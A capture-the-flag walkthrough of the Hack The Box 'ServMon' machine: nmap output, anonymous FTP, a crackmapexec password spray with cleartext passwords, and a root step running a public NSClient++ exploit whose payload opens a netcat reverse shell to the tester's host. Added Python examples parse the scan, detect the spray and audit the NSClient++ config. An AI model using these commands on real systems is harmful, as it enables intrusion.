SERVMON WRITEUP

NMAP SCANS


    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 12:11 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 12:11
    Completed NSE at 12:11, 0.00s elapsed
    Initiating NSE at 12:11
    Completed NSE at 12:11, 0.00s elapsed
    Initiating NSE at 12:11
    Completed NSE at 12:11, 0.00s elapsed
    Initiating Ping Scan at 12:11
    Scanning 10.10.10.184 [4 ports]
    Completed Ping Scan at 12:11, 0.64s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 12:11
    Completed Parallel DNS resolution of 1 host. at 12:11, 0.55s elapsed
    Initiating SYN Stealth Scan at 12:11
    Scanning 10.10.10.184 [1000 ports]
    Discovered open port 139/tcp on 10.10.10.184
    Discovered open port 22/tcp on 10.10.10.184
    Discovered open port 80/tcp on 10.10.10.184
    Discovered open port 21/tcp on 10.10.10.184
    Discovered open port 445/tcp on 10.10.10.184
    Discovered open port 135/tcp on 10.10.10.184
    Completed SYN Stealth Scan at 12:11, 3.82s elapsed (1000 total ports)
    Initiating Service scan at 12:11
    Scanning 6 services on 10.10.10.184
    Completed Service scan at 12:13, 129.20s elapsed (6 services on 1 host)
    Initiating OS detection (try #1) against 10.10.10.184
    Retrying OS detection (try #2) against 10.10.10.184
    Initiating Traceroute at 12:13
    Completed Traceroute at 12:13, 0.53s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 12:13
    Completed Parallel DNS resolution of 2 hosts. at 12:13, 0.40s elapsed
    NSE: Script scanning 10.10.10.184.
    Initiating NSE at 12:13
    NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
    Completed NSE at 12:13, 22.17s elapsed
    Initiating NSE at 12:13
    Completed NSE at 12:13, 1.45s elapsed
    Initiating NSE at 12:13
    Completed NSE at 12:13, 0.00s elapsed
    Nmap scan report for 10.10.10.184
    Host is up (0.86s latency).
    Not shown: 651 filtered ports, 343 closed ports
    PORT    STATE SERVICE       VERSION
    21/tcp  open  ftp           Microsoft ftpd
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_01-18-20  12:05PM       <DIR>          Users
    | ftp-syst: 
    |_  SYST: Windows_NT
    22/tcp  open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
    | ssh-hostkey: 
    |   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
    |   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
    |_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
    80/tcp  open  http
    | fingerprint-strings: 
    |   GetRequest, HTTPOptions, RTSPRequest: 
    |     HTTP/1.1 200 OK
    |     Content-type: text/html
    |     Content-Length: 340
    |     Connection: close
    |     AuthInfo: 
    |     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    |     <html xmlns="http://www.w3.org/1999/xhtml">
    |     <head>
    |     <title></title>
    |     <script type="text/javascript">
    |     window.location.href = "Pages/login.htm";
    |     </script>
    |     </head>
    |     <body>
    |     </body>
    |     </html>
    |   NULL: 
    |     HTTP/1.1 408 Request Timeout
    |     Content-type: text/html
    |     Content-Length: 0
    |     Connection: close
    |_    AuthInfo:
    |_http-favicon: Unknown favicon MD5: 3AEF8B29C4866F96A539730FAB53A88F
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: Site doesn't have a title (text/html).
    135/tcp open  msrpc         Microsoft Windows RPC
    139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp open  microsoft-ds?
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port80-TCP:V=7.80%I=7%D=6/21%Time=5EEF010B%P=x86_64-pc-linux-gnu%r(NULL
    SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
    SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
    SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
    SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
    SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
    SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
    SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
    SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
    SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
    SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
    SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
    SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
    SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
    SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
    SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
    SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
    SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
    SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
    SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
    SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
    SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
    SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
    SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
    SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
    SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
    SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
    SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
    SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
    SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
    Aggressive OS guesses: Microsoft Windows Longhorn (94%), Microsoft Windows 10 1703 (93%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 8.1 Update 1 (93%), Microsoft Windows 10 1511 (92%), Microsoft Windows 7 Enterprise SP1 (92%), Microsoft Windows 8 (92%), Microsoft Windows Vista SP1 (92%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=261 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: 4m55s
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2020-06-21T06:48:29
    |_  start_date: N/A

    TRACEROUTE (using port 995/tcp)
    HOP RTT       ADDRESS
    1   521.41 ms 10.10.14.1
    2   521.53 ms 10.10.10.184

    NSE: Script Post-scanning.
    Initiating NSE at 12:13
    Completed NSE at 12:13, 0.00s elapsed
    Initiating NSE at 12:13
    Completed NSE at 12:13, 0.00s elapsed
    Initiating NSE at 12:13
    Completed NSE at 12:13, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 170.22 seconds
            Raw packets sent: 1836 (84.788KB) | Rcvd: 453 (21.422KB)
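
The scan above is the kind of report a defender also wants in a structured form: which ports are open, what version banner each service gave, and which NSE findings matter. The following parser is an added example (not part of the original writeup); it reads the Nmap normal-output port table and script blocks from a constructed excerpt modelled on the scan above and turns the two findings that deserve a ticket (anonymous FTP and SMB signing not required) into a short list.

```python
"""Parse the port table and NSE script output of an Nmap normal-format report.

Added example, not part of the original writeup. It pulls open ports, service
versions and script results out of text like the scan above and reports the
two findings a defender should act on first.
"""
import re
from dataclasses import dataclass, field

# Constructed excerpt modelled on the ServMon scan above (not a live scan).
SAMPLE_NMAP = """\
PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
22/tcp  open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp  open  http
|_http-title: Site doesn't have a title (text/html).
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?

Host script results:
|_clock-skew: 4m55s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class PortInfo:
    port: int
    proto: str
    state: str
    service: str
    version: str = ""
    scripts: dict = field(default_factory=dict)


class _ScriptCollector:
    """Accumulates '|' lines into target[script_name] = output; a '|_' line closes a block."""

    def __init__(self, target):
        self.scripts, self._key, self._open = target, None, False

    def feed(self, line):
        last = line.startswith("|_")
        body = (line[2:] if last else line[1:]).strip()
        if not self._open:                      # first line of a script result: "name: value"
            self._key, _, value = body.partition(":")
            self._key = self._key.strip()
            self.scripts[self._key] = value.strip()
        else:                                   # continuation line of the open script
            self.scripts[self._key] = (self.scripts[self._key] + "\n" + body).strip()
        self._open = not last


def parse_nmap(text):
    """Return (list of PortInfo, dict of host-level script results)."""
    ports, host_scripts = [], {}
    host = _ScriptCollector(host_scripts)
    collector, in_host = None, False
    for line in text.splitlines():
        if line.startswith("Host script results"):
            in_host, collector = True, None
            continue
        m = PORT_RE.match(line)
        if m and not in_host:
            info = PortInfo(int(m[1]), m[2], m[3], m[4], (m[5] or "").strip())
            ports.append(info)
            collector = _ScriptCollector(info.scripts)
        elif line.startswith("|"):
            if in_host:
                host.feed(line)
            elif collector is not None:
                collector.feed(line)
    return ports, host_scripts


def findings(ports, host_scripts):
    """Turn the parsed report into the checks a defender would act on."""
    out = []
    for p in ports:
        if p.state == "open" and "Anonymous FTP login allowed" in p.scripts.get("ftp-anon", ""):
            out.append(f"{p.port}/{p.proto}: anonymous FTP login allowed")
    smb_open = any(p.port == 445 and p.state == "open" for p in ports)
    if smb_open and "not required" in host_scripts.get("smb2-security-mode", ""):
        out.append("445/tcp: SMB signing enabled but not required")
    return out


if __name__ == "__main__":
    ports, host = parse_nmap(SAMPLE_NMAP)
    for p in ports:
        print(f"{p.port}/{p.proto:<4} {p.service:<14} {p.version}")
    for f in findings(ports, host):
        print("FINDING:", f)
```

Both findings are configuration issues on the host: anonymous FTP exposing user folders is what hands over the password list later in this writeup, and SMB signing "enabled but not required" is what lets crackmapexec report `signing:False`.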

FTP LOGINS AND ENUMERATION

Since nmap identified that anonymous FTP was permitted, I'll grab all of the files there with wget -r ftp://anonymous:@10.10.10.184 (this would not be a great idea on a real server, where I'd be pulling down tons of stuff, but it works well for a CTF like HTB). There were two files:


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #ftp 10.10.10.184
    Connected to 10.10.10.184.
    220 Microsoft FTP Service
    Name (10.10.10.184:root): anonymous
    331 Anonymous access allowed, send identity (e-mail name) as password.
    Password:
    230 User logged in.
    Remote system type is Windows_NT.
    ftp> cd Users
    250 CWD command successful.
    ftp> cd Nadine
    250 CWD command successful.
    ftp> ls
    200 PORT command successful.
    125 Data connection already open; Transfer starting.
    01-18-20  12:08PM                  174 Confidential.txt
    226 Transfer complete.
    ftp> cd ../Nathan
    250 CWD command successful.
    ftp> ls
    200 PORT command successful.
    150 Opening ASCII mode data connection.
    01-18-20  12:10PM                  186 Notes to do.txt
    226 Transfer complete.
    ftp> 

SMB ENUMERATION

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #smbclient -L 10.10.10.184
    Enter WORKGROUP\root's password: 
    session setup failed: NT_STATUS_ACCESS_DENIED
    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #

WEBSITE ENUMERATION

https://www.exploit-db.com/exploits/48311

CRACKING PASSWORDS


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ # crackmapexec smb 10.10.10.184 -u nathan -p pass.txt 
    SMB         10.10.10.184    445    SERVMON          [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:SERVMON) (signing:False) (SMBv1:False)
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:L1k3B1gBut7s@W0rk STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nathan:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE 
    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ # crackmapexec smb 10.10.10.184 -u nadine -p pass.txt 
    SMB         10.10.10.184    445    SERVMON          [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:SERVMON) (signing:False) (SMBv1:False)
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [-] SERVMON\nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE 
    SMB         10.10.10.184    445    SERVMON          [+] SERVMON\nadine:L1k3B1gBut7s@W0rk 
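
On the target, the crackmapexec run above shows up as a burst of logon failures (Security event 4625) for two accounts from one source address, followed by a single network logon success (event 4624) for nadine. The detector below is an added example, not part of the original writeup: it runs over constructed sample events (not real logs) in a simple pipe-separated form and raises an alert when a network logon succeeds after a run of failures from the same source, plus a lower-confidence alert for a burst that never succeeded.

```python
"""Detect a password spray like the crackmapexec run above from Windows logon events.

Added example, not from the original writeup. It keeps a per-source sliding
window of 4625 failures and alerts when a 4624 network logon (type 3, which
covers SMB) succeeds after at least `min_failures` failures in that window.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs), one per line:
# time | event id | account | source ip | logon type (3 = network, i.e. SMB)
SAMPLE_EVENTS = """\
2020-06-21T06:50:01|4625|nathan|10.10.14.12|3
2020-06-21T06:50:02|4625|nathan|10.10.14.12|3
2020-06-21T06:50:03|4625|nathan|10.10.14.12|3
2020-06-21T06:50:04|4625|nathan|10.10.14.12|3
2020-06-21T06:50:05|4625|nathan|10.10.14.12|3
2020-06-21T06:50:06|4625|nathan|10.10.14.12|3
2020-06-21T06:50:07|4625|nathan|10.10.14.12|3
2020-06-21T06:50:20|4625|nadine|10.10.14.12|3
2020-06-21T06:50:21|4625|nadine|10.10.14.12|3
2020-06-21T06:50:22|4625|nadine|10.10.14.12|3
2020-06-21T06:50:23|4624|nadine|10.10.14.12|3
2020-06-21T06:49:00|4625|backupsvc|10.10.10.5|3
2020-06-21T06:49:05|4624|backupsvc|10.10.10.5|3
2020-06-21T06:55:00|4625|admin|10.10.14.99|3
2020-06-21T06:55:01|4625|admin|10.10.14.99|3
2020-06-21T06:55:02|4625|admin|10.10.14.99|3
2020-06-21T06:55:03|4625|admin|10.10.14.99|3
2020-06-21T06:55:04|4625|admin|10.10.14.99|3
2020-06-21T06:55:05|4625|admin|10.10.14.99|3
"""


def parse_events(text):
    """Parse the constructed line format above into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, account, src, ltype = line.split("|")
        events.append({"time": datetime.fromisoformat(ts), "id": int(eid),
                       "account": account, "src": src, "logon_type": int(ltype)})
    return events


def detect_spray(events, window=timedelta(minutes=5), min_failures=5):
    """Return alerts: 'spray-success' (failures then a success) or 'spray-burst' (failures only)."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        recent, peak, hit = [], 0, False          # failures still inside the window
        for e in evs:
            recent = [f for f in recent if e["time"] - f["time"] <= window]
            if e["id"] == 4625:
                recent.append(e)
                peak = max(peak, len(recent))
            elif e["id"] == 4624 and e["logon_type"] == 3 and len(recent) >= min_failures:
                hit = True
                alerts.append({"type": "spray-success", "src": src, "failures": len(recent),
                               "accounts": sorted({f["account"] for f in recent}),
                               "success": e["account"], "at": e["time"]})
        if not hit and peak >= min_failures:      # a burst that never got in still matters
            alerts.append({"type": "spray-burst", "src": src, "failures": peak})
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The one benign failure-then-success from 10.10.10.5 (a mistyped service password) stays below the threshold, which is the point of keying on volume per source rather than on any single failure.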

SSH LOGIN USER ACCESS


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #ssh nadine@10.10.10.184
    nadine@10.10.10.184's password: 


    Microsoft Windows [Version 10.0.18363.752]
    (c) 2019 Microsoft Corporation. All rights reserved.

    nadine@SERVMON C:\Users\Nadine>ls
    'ls' is not recognized as an internal or external command,
    operable program or batch file.

    nadine@SERVMON C:\Users\Nadine>dir
    Volume in drive C has no label.
    Volume Serial Number is 728C-D22C

    Directory of C:\Users\Nadine

    08/04/2020  23:16    <DIR>          .
    08/04/2020  23:16    <DIR>          ..
    18/01/2020  11:23    <DIR>          3D Objects    
    18/01/2020  11:23    <DIR>          Contacts      
    08/04/2020  22:28    <DIR>          Desktop       
    08/04/2020  22:28    <DIR>          Documents     
    18/01/2020  11:23    <DIR>          Downloads     
    08/04/2020  22:27    <DIR>          Favorites     
    08/04/2020  22:27    <DIR>          Links
    18/01/2020  11:23    <DIR>          Music
    18/01/2020  11:31    <DIR>          OneDrive      
    18/01/2020  11:23    <DIR>          Pictures      
    18/01/2020  11:23    <DIR>          Saved Games   
    18/01/2020  11:23    <DIR>          Searches      
    18/01/2020  11:23    <DIR>          Videos        
                0 File(s)              0 bytes     
                15 Dir(s)  27,858,857,984 bytes free

    nadine@SERVMON C:\Users\Nadine>cd Desktop

    nadine@SERVMON C:\Users\Nadine\Desktop>dir
    Volume in drive C has no label.
    Volume Serial Number is 728C-D22C

    Directory of C:\Users\Nadine\Desktop

    08/04/2020  22:28    <DIR>          .
    08/04/2020  22:28    <DIR>          ..
    21/06/2020  08:06                34 user.txt
                1 File(s)             34 bytes
                2 Dir(s)  27,859,218,432 bytes free

    nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
    1ef91a525ec2fab2d6a65fc0a385d66f

    nadine@SERVMON C:\Users\Nadine\Desktop>

GETTING ROOT ACCESS


The NSClient++ exploit was not working for me in the browser, so I used this one!


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #searchsploit nsclient
    ----------------------------------------------------------------------------------------------------- ---------------------------------
    Exploit Title                                                                                       |  Path
    ----------------------------------------------------------------------------------------------------- ---------------------------------
    NSClient++ 0.5.2.35 - Authenticated Remote Code Execution                                            | json/webapps/48360.txt
    NSClient++ 0.5.2.35 - Privilege Escalation                                                           | windows/local/46802.txt
    ----------------------------------------------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results
    ┌─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #searchsploit -m json/webapps/48360.txt
    Exploit: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
        URL: https://www.exploit-db.com/exploits/48360
        Path: /usr/share/exploitdb/exploits/json/webapps/48360.txt
    File Type: Python script, ASCII text executable, with CRLF line terminators

    Copied to: /root/Desktop/HTB/servmon/48360.txt


    ┌─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #

Exploiting it using the script:


    ┌─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #mv 48360.txt exploit.py
    ┌─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #chmod +x exploit.py 
    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #python3 exploit.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c "c:/temp/nc.exe 10.10.14.12 9009 -e cmd.exe"
    [!] Targeting base URL https://127.0.0.1:8443
    [!] Obtaining Authentication Token . . .
    [+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
    [!] Enabling External Scripts Module . . .
    [!] Configuring Script with Specified Payload . . .
    [+] Added External Script (name: nnXjfcSwKTn)
    [!] Saving Configuration . . .
    [!] Reloading Application . . .
    [!] Waiting for Application to reload . . .
    [!] Obtaining Authentication Token . . .
    [+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
    [!] Triggering payload, should execute shortly . . .
    [!] Timeout exceeded. Assuming your payload executed . . .

Listening on the given port:


    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/servmon]
    └──╼ #nc -lnvp 9009
    listening on [any] 9009 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.184] 49940
    Microsoft Windows [Version 10.0.18363.752]
    (c) 2019 Microsoft Corporation. All rights reserved.

    C:\Program Files\NSClient++>whoami
    whoami
    nt authority\system
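
Everything the script above does goes through NSClient++'s own configuration: it authenticates to the web API with the admin password, enables the external scripts module, registers a script (the random name nnXjfcSwKTn in the output) and reloads the service, which then runs the command as SYSTEM. The audit below is an added example, not from the writeup or the NSClient++ project; it reads an nsclient.ini and flags the settings that make that chain work, using constructed weak and hardened configs rather than the box's real file. The section and key names (/modules, CheckExternalScripts, /settings/default, allowed hosts, /settings/external scripts) follow NSClient++'s ini layout as I know it and the set of expected script names is an assumption; check both against your own install.

```python
"""Audit an NSClient++ nsclient.ini for the settings the root step above depends on.

Added example, not from the writeup or the NSClient++ project. Section and key
names are assumed to match NSClient++'s ini layout; EXPECTED_SCRIPTS is the
administrator's own allowlist (assumed here).
"""
import configparser

EXPECTED_SCRIPTS = {"check_disk"}                  # scripts deployed on purpose (assumption)
LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Constructed config resembling the state after the exploit run above (not the box's file).
WEAK_INI = """\
[/modules]
WEBServer = enabled
CheckExternalScripts = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = example-password-placeholder

[/settings/WEB/server]
port = 8443

[/settings/external scripts]
allow arguments = true

[/settings/external scripts/scripts]
check_disk = scripts\\check_disk.bat
nnXjfcSwKTn = c:\\temp\\unexpected.exe
"""

# Constructed hardened counterpart: module off, no stray scripts, no argument passing.
HARDENED_INI = """\
[/modules]
WEBServer = enabled
CheckExternalScripts = disabled

[/settings/default]
allowed hosts = 127.0.0.1
password = example-password-placeholder

[/settings/WEB/server]
port = 8443

[/settings/external scripts]
allow arguments = false
"""


def _on(value):
    return value.strip().lower() in {"enabled", "1", "true"}


def audit(ini_text, expected_scripts=EXPECTED_SCRIPTS):
    """Return a list of (severity, message) findings for an nsclient.ini."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str                        # keep key case (CheckExternalScripts, WEBServer)
    cp.read_string(ini_text)

    def get(section, key):
        return cp.get(section, key, fallback="")

    findings = []
    if _on(get("/modules", "CheckExternalScripts")):
        findings.append(("HIGH", "CheckExternalScripts enabled: anyone holding the web password "
                                 "can register a script and have the service run it"))
    if _on(get("/settings/external scripts", "allow arguments")):
        findings.append(("HIGH", "external scripts accept caller-supplied arguments"))
    if cp.has_section("/settings/external scripts/scripts"):
        for name, cmd in cp.items("/settings/external scripts/scripts"):
            if name not in expected_scripts:
                findings.append(("HIGH", f"unexpected external script {name!r} -> {cmd}"))

    if _on(get("/modules", "WEBServer")):
        hosts = [h.strip() for h in get("/settings/default", "allowed hosts").split(",") if h.strip()]
        if not hosts or any(h not in LOOPBACK for h in hosts):
            findings.append(("MEDIUM", f"web API not limited to loopback (allowed hosts = {hosts})"))
        else:
            findings.append(("INFO", "web API limited to loopback; a local port forward still "
                                     "reaches it (the run above targets 127.0.0.1:8443)"))
        if get("/settings/default", "password"):
            findings.append(("INFO", "web password stored in clear text in nsclient.ini; "
                                     "restrict who can read the file"))
    return findings


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(f"== {label} ==")
        for severity, message in audit(ini):
            print(f"[{severity}] {message}")
```

Run against the weak config, the three HIGH findings are exactly the chain the script above relies on; the hardened config leaves only the informational notes about the loopback binding and the clear-text password, which is why the file's NTFS ACL and the strength of that password are the remaining controls.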

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
